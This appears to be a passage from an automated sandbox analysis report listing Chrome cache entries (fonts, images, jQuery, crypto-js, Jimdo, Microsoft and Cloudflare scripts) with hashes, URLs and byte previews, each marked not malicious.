Preview:	window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(475))/1*(-parseInt(U(457))/2)+-parseInt(U(492))/3+parseInt(U(460))/4+parseInt(U(514))/5+parseInt(U(452))/6+parseInt(U(491))/7+parseInt(U(517))/8,g===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,363178),h=this\|\|self,i=h[V(500)],j={},j[V(546)]='o',j[V(490)]='s',j[V(478)]='u',j[V(503)]='z',j[V(493)]='n',j[V(549)]='I',j[V(458)]='b',k=j,h[V(477)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null\|\|D===void 0)return F;for(H=n(D),g[a0(505)][a0(530)]&&(H=H[a0(464)](g[a0(505)][a0(530)](D))),H=g[a0(450)][a0(462)]&&g[a0(535)]?g[a0(450)][a0(462)](new g[(a0(535))](H)):function(N,a1,O){for(a1=a0,N[a1(533)](),O=0;O<N[a1(520)];N[O]===N[O+1]?N[a1(532)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(501)][a0(523)](I),J=0;J<H[a0(520)];K=H[J],L=m(g,D,K),I(L)?(M=L==='s'&&!g[a0(522)](D[K]),a0(486)===E+K?G(E+K,L):M\|\|G(E+K,D[K])):G(E+K,L),J++);return F;function G(N

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
Category:	downloaded
Size (bytes):	8000
Entropy (8bit):	7.97130996744173
Encrypted:	false
SSDEEP:
MD5:	72993DDDF88A63E8F226656F7DE88E57
SHA1:	179F97EC0275F09603A8DB94D4380EB584D81CD5
SHA-256:	F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
SHA-512:	7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
Preview:	wOF2.......@......?@.................................`..T..t...6..6.$..h. ..T.....1E.r.8...KD......2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~\|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......\|.b.....{...9..A6...V\|.N...Z?+\|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..\|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..\|.j..f..7....).~....n......c.3....t.......s..>...

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	4762
Entropy (8bit):	7.920596603937304
Encrypted:	false
SSDEEP:
MD5:	ECE185FA42C195AEF27EF7C52D564C52
SHA1:	A4AC704B1209766CAB9614014FEFB3EAA05CB421
SHA-256:	82F34CD0034785B38484E38CDDFBEB974A8D10A6878EAD0DC99B4279AFF23B16
SHA-512:	03B1FF6B55871ED5CFE7130AE2242516ECBAEB200AFC88CF172BA8EBD2E4E70ED821DAE6139E9B59557EF6A4F87FE2E017F52D2963ACD83EDBB8C259A9E88330
Malicious:	false
Reputation:	unknown
URL:	"https://jimdo-storage.freetls.fastly.net/image/491708958/cd159ee6-b753-45e0-bbfb-dbd35eb9ab16.png?quality=80,90&auto=webp&disable=upscale&width=160&height=29&trim=0,0,0,0"
Preview:	RIFF....WEBPVP8L..../....M0h...}/..g.O!..)w..p7.Y/.+dk...B...`.H.....;.{.%..HR.c..C..3.Q$IaDp......3........V.....S..q.!.....,.,..R..(..1..\..W...^..u.\..........Q.{.....a!.,\..s.v.qm`4.....;..\|.. .'...O.m.mt.V.sNX.N&...k....o..?.e...;....$A..4...b,...P.#I.m-.U....=..=..l.6...M....w..-I.%I.m!.zA?./...i....M.i.2%...e..j.Z.(...#gY3.(.:C....v...;.>U.E.3....z...).. ....d....... ..P..) .k..S...4....._.>.>_..i...t..D28......q..V\Gvy}.......P.....C....:.T.)2.K..>U:...S..@.;...1.S..s(U.NR9.E$.../N.j Y..t@:.....e..-....a....J..H39..>7s>3#..'...L..\|....._".0wYfu:.@J..s...8D.l.f.......:...{...S.(...H..4..4...k.......=qIA..G&.....*f..I.Y?.^W....E.."./.....dHMZ....U5..\|......^L.4..........R..:zI...p.x...]rF..H..CP....>..D.n.].J.il>..I...V.weK6.G2.=B...s........)7[.e....g....Wc..xA.t.X6.n.2m...).@.t..J.....65H..$=J%....E..f<8u...C.N..s...;q..Ns...~.mU...}..i.x5..r/)m...N...L...B.=..rvP.sE0..J.t.............M.8K..'...tV.....B.[V.j....W@.C..s.w.u.{/.kh.

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	549
Entropy (8bit):	6.943052302431237
Encrypted:	false
SSDEEP:
MD5:	FD400ADA20E53B4BB4EFBBEB0C0E16FD
SHA1:	16C4AEFE874E9B5952A1E72528E1011BD38D8772
SHA-256:	E29475FE49A5A23D5ECA32E07367AA425D4A1F32D75DFE7E6D8D0398C35802CE
SHA-512:	3B144B04507C840A7A0A350480B4846D4A37B98551DA2B993879FE5995A48FCAAB0C3967ACDE6B57C6FEB3FB43E3F28B5CBFB7D69B9E8FDBF573EFD577626967
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....D.......sRGB.........PLTE...........'..1..4...........&........H..H..7.......!K!#M.......5.....J..D&(Q56].....;.......8..;...........WXw68^[\{...st...G........@\^\|...OPqtu.......gh.JKm......ACf..2..9UVv...........OQr..8.x.....:tRNS..Y...Y....Y..............................................7......IDAT8..W..0..O.I.`..{...?e..D`.O......0,.D.D..I$&......T.@..A..:.1@.._<A.t6....A.vN...@&K..'.....@....+.Vk.W.lZoP.l1.F.......C...xb.....\|.D.....o....n...G.......f.....K.}hqB.............{.!zf1;.....IEND.B`.

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/favicon.ico?v2
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 60 x 91, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.068159130770306
Encrypted:	false
SSDEEP:
MD5:	F7294FE6F23E72EE6BE5B79F1DC83A17
SHA1:	786EF7CE935352C8F19A1C1D492C7A3F707F97E4
SHA-256:	7F640CCE5D09307807D42A3D747C5D85C64AA479B710B01F086B9B700AAC2D00
SHA-512:	3D7826B7E17AAAAE2748377DE8AB9C388B1F38AF9B7CD4B39F26C7F2AF984F75FFE2713C07837C740D8583F302EE9EE77C7CA99A769172EF73942D25C6CE9277
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8e80a3e75fefefa1/1732527242385/zKxeEhxuu56vLc2
Preview:	.PNG........IHDR...<...[......oq.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
Category:	downloaded
Size (bytes):	18596
Entropy (8bit):	7.988788312296589
Encrypted:	false
SSDEEP:
MD5:	C83E4437A53D7F849F9D32DF3D6B68F3
SHA1:	FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
SHA-256:	D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
SHA-512:	C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
Preview:	wOF2......H...........H=................................\|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q.......uD.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..\|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.\|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..\|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48316), with no line terminators
Category:	downloaded
Size (bytes):	48316
Entropy (8bit):	5.6346993394709
Encrypted:	false
SSDEEP:
MD5:	2CA03AD87885AB983541092B87ADB299
SHA1:	1A17F60BF776A8C468A185C1E8E985C41A50DC27
SHA-256:	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
SHA-512:	13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create\|\|function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init\|\|(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65458)
Category:	downloaded
Size (bytes):	5932342
Entropy (8bit):	5.614383732044041
Encrypted:	false
SSDEEP:
MD5:	D98C7ED65F41B76B18D2316F81DC025F
SHA1:	36E0F32C74F4430AA730A6690534DA029AC303F8
SHA-256:	ECB68B0D52D2645EFF87509951158A5753D43F265EEDD76D15B7C66FC9160A5B
SHA-512:	284EDDEBFD0AABD102AC92F7880F542454EBCF394801CD27EEC149AD93A89D5B2F1C06C83425C54B7FE4DBACBE6970F5D0D6D6898033929A7F8A5A209EA7BDC6
Malicious:	false
Reputation:	unknown
URL:	https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/1cd5e35947f9c4be43de.js
Preview:	/! For license information please see 1cd5e35947f9c4be43de.js.LICENSE.txt /.(()=>{var e,t,n,i,a={58695:(e,t,n)=>{"use strict";n(33893).Cookie;var i=n(76046);t.u5=i.CKies,i.CookieOptions,i.CookieType},76046:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var i,a,o=n(33893);!function(e){e.NECESSARY="necessary",e.FUNCTIONAL="functional",e.PERFORMANCE="performance",e.MARKETING="marketing"}(i=t.CookieType\|\|(t.CookieType={})),function(e){e.ALLOW="allow",e.DENY="deny"}(a=t.CookieOptions\|\|(t.CookieOptions={})),t.CONFIG_EXPIRATION=31536e6;var r=function(){function e(){}return e.getExpireDate=function(){var e=new Date;return e.setTime(e.getTime()+t.CONFIG_EXPIRATION),e},e.key=function(e){return"ckies_"+e},e.use=function(e){return e===i.NECESSARY\|\|(this.isOptIn()?o.Cookie.get(this.key(e))===a.ALLOW:o.Cookie.get(this.key(e))!==a.DENY)},e.deny=function(e){this.set(e,a.DENY)},e.allow=function(e){this.set(e,a.ALLOW)},e.useNecessary=function(){return this.use(i.NECESSARY)},e.

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	15
Entropy (8bit):	3.189898095464287
Encrypted:	false
SSDEEP:
MD5:	39A19D0882684989864FA50BCED6A2D1
SHA1:	5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
SHA-256:	8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
SHA-512:	E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
Malicious:	false
Reputation:	unknown
URL:	https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Preview:	/* empty css */

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32089)
Category:	dropped
Size (bytes):	92629
Entropy (8bit):	5.303443527492463
Encrypted:	false
SSDEEP:
MD5:	397754BA49E9E0CF4E7C190DA78DDA05
SHA1:	AE49E56999D82802727455F0BA83B63ACD90A22B
SHA-256:	C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
SHA-512:	8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v1.9.1 \| (c) 2005, 2012 jQuery Foundation, Inc. \| jquery.org/license.//@ sourceMappingURL=jquery.min.map./(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d\.\|)\d+(?:[eE][+-]?\d+\|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]\|#([\w-]))$/,C=/^<(\w+)\s\/?>(?:<\/\1>\|)$/,k=/^[\],:{}\s]$/,E=/(?:^\|:\|,)(?:\s\[)+/g,S=/\\(?:["\\\/bfnrt]\|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"\|true\|false\|null\|-?(?:\d+\.\|)\d+(?:[eE][+-]?\d+\|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener\|\|"load"===e.type\|\|"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	4802
Entropy (8bit):	5.415883081641602
Encrypted:	false
SSDEEP:
MD5:	A90A2E5B9A3C097A815681A49DA9E6A1
SHA1:	1142CB363AB1A35E64546ED886CFD00B5093F504
SHA-256:	308FCE1E8CC31B982E8ED8A78A0729F7935F0056FDCE41483C59691B1339599E
SHA-512:	B006B37B8EBF9FFBF3291AB773CE36E6F8AC671FE63DF080596C102E5651CB7B12FDBE407645ACFF84101EDDD777564BED23B66B12EC10CFE30B6420643B58E8
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Roboto:400,700"
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.jimstat

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 160 x 96, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	10097
Entropy (8bit):	7.9549455363890385
Encrypted:	false
SSDEEP:
MD5:	80D9BCEAD83CD850929918730BCE2516
SHA1:	C42C10373B957AB0D5C4E8E08F19C3E6B76E8E3A
SHA-256:	30FAF0B7F6BBA94FCDF46E7823588242B954E2BA12469FB3F8017E6897D9BF80
SHA-512:	39875F30FC0D023837BBE92A7FFBBC2E9103623FAE1129A67BFBC06D987F18E6825EB5736BC3CA517A8D278B8F77621F6A63A8E38DF6DAD299CCC0EA81A3D2E4
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......`......E......sRGB....... .IDATx..}w\|.E..............J. ... H.........tU."E..UAj.E....B.$..{s...3s~.<I..M.....n.......g...9s...........S....P...E..L.....2.P...,.F.D..R...=y..@T.\.(C.Q ......=....J@....+P....,.@@..~..ha.FT.'.7.m.\.+.q...(..F.B...F.M...H{{.p......^.\...B......+70jBY.,.y.e..B).....e@0.....P.nB(. .J..s..7..%..V......P........3.L..R..e..x.9.Ram..J..B..ns\m..7.:!.{......k.Zfh.....r..@.$..U.....n......^..P.....B.F..f-..Q......L.......(.po..J_I....;,@4..C.....]"lNBi...Qj.#.@.=a.e..JMP.....].'.?\..XaN.1J.`B...5..6~........G".0&...[P.>....%.V.Ye...E.EZ.....'.........ez.0."...S'..S......goD.!...*C.......l.Q..j...........,...0...b...WFF.m...n..~x.../.....Q....A..@...._-!F..2..Q..4.)....[lY...m../j..f.....s.NT<2"Vm]k.W.)............s...... 1@@...LR\|7.+SHlM..MM....wb...O..lZ.V.^.......>U....]........t.V..@.1.........V.Pp...M..Jz..(........].l.!e......U..@..a.g..h@.@..N".5cGi'.%.........j.......\|..]..PF..2..L..

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1700
Entropy (8bit):	5.3411077766821125
Encrypted:	false
SSDEEP:
MD5:	33E70261AA35332F2CCEA37DD6E403B5
SHA1:	6C9E0966509BFA7D970958B0829BAA1BC65C573E
SHA-256:	B70E4E2DE1A4E918B7A1ABFAA38889F5668D810941EA4206BEF4823F0EC6CADE
SHA-512:	E1CC39C0A53155AD435FD58C434801B14B85DC9875CF968D8B1A1FBF20AD7E786C352DAFE3D6C87768BF0135E8E57257E3E8BE48D254F56CB0AAA3B7C3B32402
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.jimstatic.com/css?display=swap&family=Poppins:600,700"
Preview:	/* latin-ext /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.jimstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./ latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 700;. font-display: swap;. src: url(https://fonts.jimsta

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
Category:	downloaded
Size (bytes):	563851
Entropy (8bit):	5.221453271093944
Encrypted:	false
SSDEEP:
MD5:	12DD1E4D0485A80184B36D158018DE81
SHA1:	EB2594062E90E3DCD5127679F9C369D3BF39D61C
SHA-256:	A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
SHA-512:	F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
Malicious:	false
Reputation:	unknown
URL:	https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
Preview:	@charset "UTF-8";/! @ms-mwf/mwf - v1.25.0+6321934 \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.//! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47694)
Category:	downloaded
Size (bytes):	47695
Entropy (8bit):	5.401533135534308
Encrypted:	false
SSDEEP:
MD5:	481EDB6F4045F16980C920CCD9705105
SHA1:	D8CB40ABC935DC65D25D83D8358F52AC88742F73
SHA-256:	5F7C821EEA52471A9BBB0397DF6B77EE279505BE05BB52AEF00932989522D3C2
SHA-512:	497484EF0BAB7D2F4ED38E8063D1BAED9C8B49775CCF490CFF0C2B9CE73265D8E5292DA9FCEEB22B4CED508B9930A6ADBB145E2E2DC458FAF67EBB706D3021D3
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/g/e4025c85ea63/api.js
Preview:	"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 26288, version 0.0
Category:	downloaded
Size (bytes):	26288
Entropy (8bit):	7.984195877171481
Encrypted:	false
SSDEEP:
MD5:	D0263DC03BE4C393A90BDA733C57D6DB
SHA1:	8A032B6DEAB53A33234C735133B48518F8643B92
SHA-256:	22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
SHA-512:	9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
Preview:	wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap..............9cvt ...4... .......fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.\|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.\|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0\|.>...O.g...E.2\|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
Category:	downloaded
Size (bytes):	18536
Entropy (8bit):	7.986571198050597
Encrypted:	false
SSDEEP:
MD5:	8EFF0B8045FD1959E117F85654AE7770
SHA1:	227FEE13CEB7C410B5C0BB8000258B6643CB6255
